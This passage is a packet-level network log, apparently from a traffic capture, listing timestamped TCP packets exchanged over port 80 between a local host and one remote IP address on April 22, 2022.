Apr 22, 2022 16:17:42.873429060 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873445988 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873449087 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873471975 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873486042 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873502970 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873519897 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873521090 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873558998 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873563051 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873581886 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873583078 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873600006 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873619080 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873621941 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873661995 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873661995 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873681068 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873698950 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873708010 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873718023 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873744011 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873759985 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873779058 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873797894 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873807907 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873832941 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873816013 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873857975 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873867035 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873877048 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873889923 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873894930 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873918056 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873934031 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873950005 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873953104 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873970985 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.873986959 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.873987913 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874006033 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874011040 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874046087 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874049902 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874064922 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874082088 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874083042 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874102116 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874111891 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874144077 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874144077 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874180079 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874181986 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874207020 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874224901 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874228954 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874244928 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874263048 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874269962 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874281883 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874295950 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874313116 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874317884 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874334097 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874344110 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874351978 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874366999 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874371052 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874389887 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874394894 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874408960 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874428034 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874432087 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874447107 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874458075 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874464035 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874483109 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874495029 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874500990 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874517918 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874531031 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874537945 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874555111 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874557972 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874572992 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874583960 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874591112 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874609947 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874619961 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874629021 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874648094 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874656916 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874665022 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874681950 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874684095 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874701977 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874720097 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874720097 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874747038 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874757051 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874764919 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874783993 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874785900 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874802113 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874819994 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874821901 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874838114 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874855995 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874861002 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874876976 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874881983 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874895096 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874907970 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874912977 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874932051 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874944925 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874949932 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874968052 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.874982119 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.874985933 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875003099 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875009060 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875021935 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875030994 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875041962 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875060081 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875072002 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875078917 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875097990 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875116110 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875133038 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875134945 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875160933 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875195026 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875214100 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875232935 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875251055 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875252008 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875268936 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875279903 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875287056 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875303984 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875307083 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875322104 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875329018 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875339031 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875359058 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875369072 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875377893 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875396013 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875406027 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875413895 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875433922 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875438929 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875457048 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875466108 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875474930 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875494957 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875503063 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875513077 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875531912 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875539064 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875555038 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875564098 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875572920 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875591040 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875600100 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875617027 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875634909 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875634909 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875654936 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875660896 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875674009 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875694990 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875720978 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875720978 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875737906 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875757933 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875776052 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875777006 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875793934 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.875840902 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.875849962 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.945816994 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.945844889 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.945866108 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.945885897 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.945902109 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.945918083 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.945935965 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.945995092 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946012974 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946027040 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946043968 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946050882 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946065903 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946084023 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946095943 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946101904 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946113110 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946120977 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946127892 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946140051 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946161032 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946161032 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946198940 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946237087 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946257114 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946269989 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946280956 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946285963 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946300030 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946320057 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946333885 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946352005 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946365118 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946369886 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946389914 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946408987 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946412086 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946430922 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946443081 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946453094 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946474075 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946475029 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946495056 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946506023 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946518898 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946538925 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946542978 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946562052 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946578979 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946583986 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946607113 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946611881 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946625948 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946647882 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946650982 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946669102 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946682930 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946688890 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946710110 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946715117 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946729898 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946743965 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946752071 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946774960 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946795940 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946799040 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946811914 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946816921 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946839094 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946846008 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946862936 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946882963 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946897030 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.946902990 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946923018 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946942091 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946963072 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946983099 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.946989059 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947001934 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947022915 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947041035 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947041035 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947060108 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947072029 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947078943 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947099924 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947108984 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947122097 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947139978 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947143078 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947160959 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947185993 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947201967 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947206020 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947226048 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947244883 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947257042 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947267056 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947285891 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947288036 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947304964 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947314024 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947325945 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947344065 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947364092 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947365999 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947386980 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947406054 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947412014 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947427034 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947443962 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947447062 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947465897 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947487116 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947493076 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947504997 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947526932 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947540045 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947549105 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947567940 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947581053 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947591066 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947611094 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947616100 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947629929 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947650909 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947653055 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947669983 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947685957 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947690010 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947710991 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947727919 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947737932 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947743893 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947766066 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947782993 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947789907 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947798967 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947819948 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947823048 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947838068 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947849989 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947858095 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947877884 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947896957 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947900057 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.947917938 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947937965 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.947949886 CEST	49842	80	192.168.2.6	193.56.146.148
